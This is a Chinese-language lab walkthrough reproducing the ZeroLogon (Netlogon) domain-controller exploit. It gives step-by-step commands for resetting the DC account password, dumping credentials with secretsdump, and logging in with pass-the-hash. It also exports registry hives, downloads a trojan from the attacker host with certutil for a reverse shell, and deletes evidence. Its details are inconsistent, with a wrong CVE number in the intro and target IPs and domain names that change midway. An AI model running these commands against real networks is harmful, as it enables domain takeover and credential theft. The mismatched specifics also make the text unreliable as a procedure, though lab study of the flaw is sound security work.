zerologon漏洞复现
目录
漏洞介绍
CVE-2020-14722 (又称ZeroLogon)
是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。
实验环境
攻击机:192.168.1.8 ubuntu
域控服务器:192.168.1.6 win2008r2
成员机:192.168.1.7 win7
实验开始
一、在github上下载脚本
git clone https://github.com/SecuraBV/CVE-2020-1472.git
git clone https://github.com/SecureAuthAuthCorp/impacket.git
由于我之前已经已经拉过了,就不放图了
二、检测是否可以利用
nbtstat -A 192.168.1.6 #查看域控主机名
域控主机名为WIN-E42RAKP2TJ2
python3 zerologon_tester.py WIN-E42RAKP2TJ2 192.168.1.6 #检测是否可以利用,相当于poc
可以利用
三、利用漏洞
1.清空域控账号密码
git clone https://github.com/dirkjanm/CVE-2020-1472.git
python3 cve-2020-1472-exploit.py LLPP 172.16.124.194 #清空
2.导出admin凭证
secretsdump.py lpone.com/LLPP\$@172.16.124.194 -no-pass >1.txt #导出admin的凭证
这里我找错example路径了,注意路径
3.登录域控主机
wmiexec.py admin@172.16.124.194 -hashes (上一步的hash值)
恢复域控原始hash
一、导出源文件
1.生成文件
先前清空的hash 为内存的hash,磁盘的hash没有变化。
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
2.上传shell
这里我用的kali的msf,因为ubuntu的msf端口反弹不回来(关闭ssh服务可以利用22端口)
certutil -urlcache -split -f http://192.168.1.8/muma.exe
3.导出文件
download sam.save
download system.save
download security.save
4.删除痕迹
del -f *.save
二、解析文件
目的是获取原账户的hash值
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
三、还原hash
1.还原
python3 restorepassword.py sshh.com/WIN-E42RAKP2TJ2@WIN-E42RAKP2TJ2 -target-ip 192.168.1.6 -hexpass 1b23bf335553baf29a8f78dee4b9b5a0
2.检测
检测是否还原
python3 secretsdump.py sshh.com/WIN-E42RAKP2TJ2\$@192.168.1.6 -no-pass
还原成功!